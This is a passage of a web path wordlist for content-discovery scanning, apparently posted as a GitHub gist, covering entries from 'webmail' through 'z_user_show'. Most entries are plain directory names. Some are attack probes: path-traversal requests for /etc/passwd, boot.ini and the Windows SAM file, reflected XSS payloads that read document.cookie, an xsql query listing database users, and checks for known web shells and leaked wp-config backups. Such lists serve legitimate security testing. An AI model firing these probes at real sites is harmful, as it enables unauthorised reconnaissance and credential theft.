webmail/lib/emailreader_execute_on_each_page.inc.php
webmail/src/configtest.php
webmail/src/read_body.php
~webmaster
webmaster
webmaster_logs/
webmasters
webMathematica/MSP?MSPStoreID=..\..\..\..\..\..\..\..\..\..\boot.ini&MSPStoreType=image/gif
webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif
webmin/
web.nsf
webpack.config.js
webpack.config.node.js
webpages
web/phpMyAdmin/
web/phpMyAdmin/scripts/setup.php
webplus
Web.Release.config
web.Release.confiп
webresource
web/scripts/setup.php
websearch
../webserver.ini
webservice
webservice/AutoComplete.amx
webservices
webshop
WebShop/
WebShop/logs/cc.txt
WebShop/templates/cc.txt
website
website/
website.git
websites
websphere
WebSphereSamples
web.sql
websql
websql/
web.sql.7z
web.sql.bz2
web.sql.gz
web.sql.rar
web.sql.tar
web.sql.tar.bz2
web.sql.tar.bzip2
web.sql.tar.gz
web.sql.tar.gzip
web.sql.tgz
web.sql.zip
webstat
webstat/
webstats
webstats/
webstats.html
Web_store/
Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html
websvn
webtools/bonsai/cvsblame.cgi?file=<script>alert('Vulnerable')</script>
webtools/bonsai/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>
webtools/bonsai/cvslog.cgi?file=<script>alert('Vulnerable')</script>
webtools/bonsai/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
webtools/bonsai/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
webtools/bonsai/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD
webtools/bonsai/showcheckins.cgi?person=<script>alert('Vulnerable')</script>
webtop/wdk/
webtop/wdk/samples/dumpRequest.jsp?J=%3Cscript%3Ealert('Vulnerable');%3C/script%3Ef
webtop/wdk/samples/index.jsp
WebTrend/
webtrends
webuser.nsf
web_users
webusers
webvpn
webwork
web.xml
wedding
week
weekly
welcome
welcome.nsf
well
wellcome
werbung
wget
what
whatever
whatever.htr
whateverJUNK(4).html
whatnot
whatsnew
white
whitepaper
whitepapers
whmcs/downloads/dz.php
whmcs.php
who
whois
wholesale
whosonline
why
wicket
wide_search
widget
widgets
wifi
wii
wiki
wikihome/action/conflict.php
will
win
win32
windows
windows/
Windows
wink
winnt
../../../../winnt/repair/sam._
wireless
wishlist
with
wiz
wizard
wizmysqladmin
wksinst.nsf
wml
wolthuis
word
word/
wordpress
work
work/
workarea
workflowtasks
working
workplace
works
workshop
workshops
.workspace/
world
worldpayreturn
worldwide
wow
wp
wp-admin
wp-admin/c99.php
wp-admin/setup-config.php
wp-app
wp-app.log
wp-atom
wpau-backup
wp-blog-header
wpcallback
wp-command.php
wp-comments
wp-commentsrss2
wp-config
wp-config.bak
wp-config.dist
wp-config.inc
wp-config.old
wp-config.php~
wp-config.php1
wp-config.php2
wp-config.php.bak
wp-config.php.dist
wp-config.php.inc
wp-config.php.old
wp-config.php.save
.wp-config.php.swp
wp-config.php.swp
wp-config.php.templ
wp-config.php.txt
wp-config.save
wp-config.swp
wp-config.txt
wp-content
wpcontent
wp-content/backup-db/
wp-content/backups/
wp-content/debug.log
wp-content/plugins/akismet/admin.php
wp-content/plugins/akismet/akismet.php
wp-content/plugins/count-per-day/js/yc/d00.php
wp-content/plugins/disqus-comment-system/disqus.php
wp-content/plugins/google-sitemap-generator/sitemap-core.php
wp-content/uploads/
wp-cron
wp-dbmanager
wp-feed
wp-icludes
wp-images
wp-includes
wp-json/wp/v2/users
wp-links-opml
wp-load
wp-login
wp-mail
wp-pass
wp.php
wp.rar/
wp-rdf
wp-register
wp-register.php
wp-rss
wp-rss2
wps
wp-settings
wp-signup
wp.sql
wp-syntax
wp-trackback
wp.zip
wp.zip/nwp-content/plugins/disqus-comment-system/disqus.php
wrap
writing
ws
ws/api_test.php
ws-client
wsdl
ws_ftp
WS_FTP
ws_ftp.ini
WS_FTP.ini
WS_FTP.LOG
wso2.5.1.php
wso2_pack.php
wso2.php
wso.php
WSO.php
ws.php
wss
wstat
wstats
wstats/
wt
wtai
wusage
wusage/
wvdial.conf
wwhelp
_www
~www
www
www/
www1
www2
www3
.www_acl
.wwwacl
wwwboard
wwwboard/passwd.txt
wwwboard/wwwboard.cgi
wwwboard/wwwboard.pl
wwwjoin
wwwjoin/
wwwlog
wwwlog/
wwwping/index.stm?wwwsite=<script>alert(document.cookie)</script>
wwwroot
www-sql
www-sql/
www.sql
www.sql.7z
www.sql.bz2
www.sql.gz
www.sql.rar
www.sql.sql
www.sql.tar
www.sql.tar.bz2
www.sql.tar.bzip2
www.sql.tar.gz
www.sql.tar.gzip
www.sql.tgz
www.sql.zip
wwwstat
wwwstats
wwwstats/
wwwstats.htm
wwwstats.html
wwwthreads
wwwthreads/3tvars.pm
wwwthreads/w3tvars.pm
wwwuser
wx/s.dll?d=/boot.ini
wysiwyg
wysiwygpro
x
X
xajax
xajax_js
xalan
xampp/phpmyadmin/
xampp/phpmyadmin/scripts/setup.php
xbox
xcache
xcart
Xcelerate/LoginPage.html
xdb
xdk/
xd.php
xd_receiver
xerces
xfer
xhtml
xlogin
xls
xls/
xmas
XMBforum/buddy.php
XMBforum/member.php
xml
XML
xml/_common.xml
xml/common.xml
xmlfiles
xmlimporter
xml-rpc
xmlrpc
xmlrpc.php
xmlrpc_server
xmlrpc_server.php
xn
x.php
xphperrors.log
xphpMyAdmin/
xsl
xsl/
xsl/_common.xsl
xsl/common.xsl
xslt
xsql
XSQLConfig.xml
xsql/demo/adhocsql/query.xsql?sql=select%20username%20from%20ALL_USERS
xsql/lib/XSQLConfig.xml
x_stat_admin.php
xx
xxx
XXX
xyz
xyzzy
y
yabbse/Reminder.php
yabbse/Sources/Packages.php
yahoo
.yardopts
year
yearly
yesterday
yml
yonetici
yonetim
youtube
yshop
yt
yui
z
zabbix/
zap
zboard
zebra.conf
zehir.php
zencart
zend
zentrack/index.php
zero
zeroclipboard.swf
zeus
.zeus.sock
.zfs/
zh
zh-cn
zh_CN
zh-tw
zh_TW
zimbra
.zip
zip
zipfiles
zipfiles/
zips
zm_cms/spaw2/dialogs/dialog.php
zoeken
zone
zone-h.php
zones
zoom
zope
zorum
zorum/index.php?method=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
zt
z_user_show.php?method=showuserlink&class=<Script>javascript:alert(document.cookie)</Script>&rollid=admin&x=3da59a9da8825&
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment